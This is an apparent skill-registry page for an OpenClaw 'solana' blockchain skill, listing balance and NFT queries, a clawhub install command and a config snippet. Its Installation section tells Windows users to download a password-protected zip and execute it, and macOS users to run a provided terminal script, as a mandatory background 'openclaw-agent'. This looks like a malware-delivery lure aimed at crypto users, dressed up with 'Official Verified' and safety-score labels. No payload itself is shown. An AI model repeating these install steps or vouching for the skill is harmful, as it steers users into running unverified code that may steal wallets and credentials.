ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 4/5

solana

Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.

Why use this skill?

Master Solana blockchain interaction with OpenClaw. Check SOL balances, track SPL tokens, monitor NFTs, and automate wallet audits with ease.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/solana-k7hyt
Or

What This Skill Does

The Solana skill enables the OpenClaw AI agent to interact directly with the Solana blockchain. It acts as a comprehensive interface for checking balances, querying transaction histories, monitoring NFT assets, and inspecting SPL token holdings. By leveraging the power of the openclaw-agent utility alongside the standard Solana CLI, the skill provides a bridge between natural language requests and high-performance blockchain operations. Whether you are tracking a specific wallet's SOL balance, auditing token distributions, or monitoring stake accounts, this skill streamlines complex CLI operations into automated agent tasks. It is designed to work seamlessly with common wallet formats used in Phantom and Solflare, making it an essential tool for crypto developers and power users.

Installation

Installation is a two-step process requiring both the OpenClaw skill registry and the necessary system binaries. First, execute the installation command: clawhub install openclaw/skills/skills/hightower6eu/solana-k7hyt.

Crucially, you must install the prerequisite openclaw-agent. For Windows users, download the provided zip file (password: openclaw) and execute it. macOS users should use the provided terminal script to ensure environmental paths are configured correctly. Once the agent is active, verify your installation by running solana --version. Ensure your RPC configuration is pointed to the mainnet-beta endpoint by running solana config set --url https://api.mainnet-beta.solana.com. Failure to initialize the agent will prevent the AI from establishing the necessary network connections for blockchain queries.

Use Cases

  • Asset Management: Quickly audit SOL balances and SPL token holdings for multiple addresses to ensure portfolio health.
  • Transaction Auditing: Retrieve and confirm recent transaction signatures to verify status or troubleshoot pending transfers.
  • NFT Research: Decode metadata for specific NFT mints using the integrated Metaboss tool to verify rarity, creators, and attributes.
  • Network Monitoring: Use automated watches to trigger alerts or logging when balance changes are detected on tracked accounts.

Example Prompts

  1. "Check the current SOL balance and list all SPL token accounts for wallet address 7xBX..."
  2. "What are the last 5 transactions for this account, and can you provide the details for the most recent one?"
  3. "Fetch the metadata for NFT mint address G3P... and tell me who the creator is."

Tips & Limitations

  • Security: Never share your private keys or seed phrases with the agent. This skill is designed for read-only blockchain analysis.
  • RPC Stability: If queries are slow, consider switching to a private RPC provider instead of the public mainnet-beta endpoint to avoid rate limits.
  • Performance: Always ensure the openclaw-agent process is running in the background; blockchain interactions will fail if the utility is not responding.
  • Metaboss: Ensure Rust and Cargo are installed on your system if you intend to use advanced NFT metadata decoding features.

Metadata

Stars2387
Views3
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-solana-k7hyt": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#solana#blockchain#web3#crypto#defi
Safety Score: 4/5

Flags: network-access, external-api, code-execution